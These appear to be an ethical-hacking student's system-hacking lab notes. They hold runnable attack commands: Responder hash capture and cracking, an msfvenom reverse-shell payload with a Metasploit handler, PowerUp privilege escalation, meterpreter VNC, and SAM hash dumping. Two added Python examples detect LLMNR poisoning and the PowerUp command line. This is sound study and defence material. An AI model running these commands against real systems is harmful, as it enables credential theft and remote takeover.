1. Gain access to the system

LLMNR is link-local (not routed beyond the local segment) and uses UDP port 5355. NetBIOS Name Service (NBT-NS) uses UDP port 137.

1. Crack the password using Responder

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are used to perform name resolution on the local link.

Responder is an LLMNR, NBT-NS and mDNS poisoner. By default the tool only responds to SMB.

Check the interfaces:

ifconfig

Now run Responder on the interface:

sudo responder -I ens33

Now when a user on the LAN tries to access an unavailable share, Responder will capture the hash.

Logs are stored in the /usr/share/responder folder. We will have a hash. Now crack it with John.

On Ubuntu you can install John as:

sudo snap install john-the-ripper
sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
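The flip side of the Responder section above is checking whether someone is running a poisoner on your own segment. A legitimate host only answers LLMNR queries for its own name, so any answer to a query for a name nobody owns is a poisoning indicator. The script below is an added example and not part of the original notes; the multicast group and port are the standard LLMNR values (224.0.0.252, UDP 5355), the probe name is constructed at runtime, and the answer parser is written here for the DNS-style wire format LLMNR uses.

```python
"""Added example (not from the original notes): a small LLMNR poisoning check.

A host that answers an LLMNR query for a name nobody owns is behaving like a
poisoner such as Responder. The multicast group and port are the standard
LLMNR values (224.0.0.252, UDP 5355, RFC 4795); the probe name is constructed
here, and the answer parser handles the DNS-style wire format LLMNR uses.
"""
import secrets
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # LLMNR IPv4 multicast group
LLMNR_PORT = 5355             # LLMNR UDP port
QTYPE_A, QCLASS_IN = 1, 1


def build_llmnr_query(name: str, txid: int) -> bytes:
    """LLMNR uses the DNS wire format: 12-byte header, then one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)   # flags=0 -> standard query
    qname = b"".join(bytes([len(part)]) + part.encode("ascii")
                     for part in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def _skip_name(data: bytes, pos: int) -> int:
    """Advance past a (possibly compressed) DNS-style name and return the new offset."""
    while True:
        length = data[pos]
        if length == 0:
            return pos + 1
        if length & 0xC0 == 0xC0:      # compression pointer: 2 bytes, ends the name
            return pos + 2
        pos += 1 + length


def parse_llmnr_answer(data: bytes, expected_txid: int):
    """Return IPv4 addresses in a response to our query, or None if it isn't one."""
    if len(data) < 12:
        return None
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid or not (flags & 0x8000) or ancount == 0:
        return None
    pos = 12
    for _ in range(qdcount):              # skip the echoed question section
        pos = _skip_name(data, pos) + 4   # + QTYPE and QCLASS
    addrs = []
    for _ in range(ancount):
        pos = _skip_name(data, pos)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        if rtype == QTYPE_A and rdlen == 4:
            addrs.append(socket.inet_ntoa(data[pos:pos + 4]))
        pos += rdlen
    return addrs


def probe_for_poisoner(timeout: float = 2.0):
    """Ask the link to resolve a random name; any answer is a poisoning indicator.

    Returns a list of (responder_ip, [advertised addresses]) tuples.
    """
    name = "nonexistent-" + secrets.token_hex(4)   # constructed name nobody owns
    txid = secrets.randbits(16)
    query = build_llmnr_query(name, txid)
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, (LLMNR_GROUP, LLMNR_PORT))
        while True:
            try:
                data, (src_ip, _port) = sock.recvfrom(1024)
            except socket.timeout:
                break
            addrs = parse_llmnr_answer(data, txid)
            if addrs:
                hits.append((src_ip, addrs))
    return hits


if __name__ == "__main__":
    for src, addrs in probe_for_poisoner():
        print(f"ALERT: {src} answered an LLMNR query for a bogus name with {addrs}")
```

Run it from a host on the same segment you want to check; a hit names the poisoner's address and the address it is trying to hand out. Because the name is random, there is no false positive from a machine that genuinely owns it, and the transaction ID check drops unrelated LLMNR traffic.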

2. Audit system passwords using L0phtCrack

Windows tool. It can crack other passwords on a remote machine over SMB if you know a single account. Use the password auditing wizard.

3. Find Vulnerabilities on exploit sites

4. Exploit client side vulnerabilities and get a VNC session

Create an msfvenom payload:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

Use Apache to transfer the file:

mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
service apache2 start

Now run msfconsole:

msfconsole
use exploit/multi/handler

Set the payload type, port and IP, then visit the IP from the target to download the executable. Run it and you will get the shell.

You can run the following commands in meterpreter:

sysinfo  //get system information

Upload a file through meterpreter.

The PowerSploit privilege escalation script is in /usr/share/windows-resources/powersploit:

upload PowerUp.ps1 powerup.ps1

Now get a shell:

shell

Now execute the script:

powershell -ExecutionPolicy bypass -command ". .\powerup.ps1;Invoke-AllChecks"

Now exit it, and to get a VNC session from meterpreter use the following command:

run vnc
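The PowerUp step above is also what a defender should be looking for in process-creation telemetry: a powershell.exe command line that turns off the execution policy, dot-sources a .ps1 file and calls Invoke-AllChecks. The script below is an added example, not part of the original notes. The log lines are constructed here in a Sysmon Event 1-like "CommandLine: ..." shape, and the rules are written for this page's command; the -ep and -exec forms are abbreviations powershell.exe accepts for -ExecutionPolicy.

```python
"""Added example (not from the original notes): flag process-creation log
lines that match the PowerUp invocation used above.

SAMPLE_LOG is constructed here; the first line is the command from the notes,
the others are benign or partially matching lines to show what is and is not
flagged.
"""
import re

# Each rule is (name, regex). All are matched case-insensitively.
RULES = [
    # -ExecutionPolicy Bypass, including the -ex/-exec/-ep short forms
    ("execution_policy_bypass",
     re.compile(r"-(?:executionpolicy|exec|ex|ep)\b\s+bypass", re.IGNORECASE)),
    # dot-sourcing a script file: ". .\something.ps1"
    ("dot_sourced_script",
     re.compile(r"""(?:^|[\s"'])\.\s+\S+\.ps1""", re.IGNORECASE)),
    # the PowerUp entry point
    ("powerup_invoke_allchecks",
     re.compile(r"Invoke-AllChecks", re.IGNORECASE)),
]

# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    'CommandLine: powershell -ExecutionPolicy bypass -command ". .\\powerup.ps1;Invoke-AllChecks"',
    'CommandLine: powershell.exe -ep bypass -c "Get-Date"',
    'CommandLine: C:\\Windows\\System32\\cmd.exe /c dir',
    'CommandLine: powershell -NoProfile -File C:\\scripts\\backup.ps1',
]


def extract_command_line(line: str) -> str:
    """Return the command-line part of a 'CommandLine: ...' record (or the whole line)."""
    _, sep, rest = line.partition("CommandLine:")
    return rest.strip() if sep else line.strip()


def match_rules(command_line: str):
    """Names of all rules that fire on one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan_log(lines):
    """Return [(line_index, [rule names])] for every line that fires at least one rule."""
    hits = []
    for idx, line in enumerate(lines):
        fired = match_rules(extract_command_line(line))
        if fired:
            hits.append((idx, fired))
    return hits


if __name__ == "__main__":
    for idx, fired in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(fired)}")
        print("    " + SAMPLE_LOG[idx])
```

The first sample line fires all three rules, which is the combination worth alerting on; the second fires only the execution-policy rule, which on its own is common enough in administrative scripts that it is better treated as a low-severity signal than an alert.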

5. Gain access to a system using Armitage

GUI-based front end for Metasploit.

service postgresql start

Now run Armitage from the Applications menu. Run an intense scan, then create a payload according to the target.

Once the victim opens the payload, we get the session.

6. Gain access to system using Ninja Jonin

Ninja is installed on target and Jonin on attacker machine.

Edit its config file to change the IP and port.

Open the Jonin listener; it will catch the sessions.

list       //list all sessions
connect 1  //connect to session 1
change     //to get to cmd
cmd
help       //displays help

7. Buffer Overflow (to-do list)

Reference

Tools required

Immunity Debugger requires Python 2.

Run vulnserver. Open the debugger and attach the process. Click Run to execute it.

Connect to the server from the attacking machine (netcat):

nc -nv 10.10.10.10 9999

a. Spiking

Type help to see a list of commands supported by the server.

Now let's spike the commands one by one. Create a new file:

pluma stats.spk

Paste the following script in it:

s_readline();
s_string("STATS");
s_string_variable("0");

Save the script. Now test it:

generic_send_tcp 10.10.1.11 9999 stats.spk 0 0

0 and 0 are the values of SKIPVAR and SKIPSTR.

If the program does not crash on Windows, the parameter is not vulnerable. Now let's test the other parameter.

pluma trun.spk    // create a file
s_readline();
s_string("TRUN");
s_string_variable("0");
generic_send_tcp 10.10.1.11 9999 trun.spk 0 0    // send the script

The program in Immunity Debugger will appear as paused and the registers will be overwritten with A's.

b. Fuzzing

System password hacking

# To dump Windows SAM file hashes
pwDump7.exe > hashes.txt
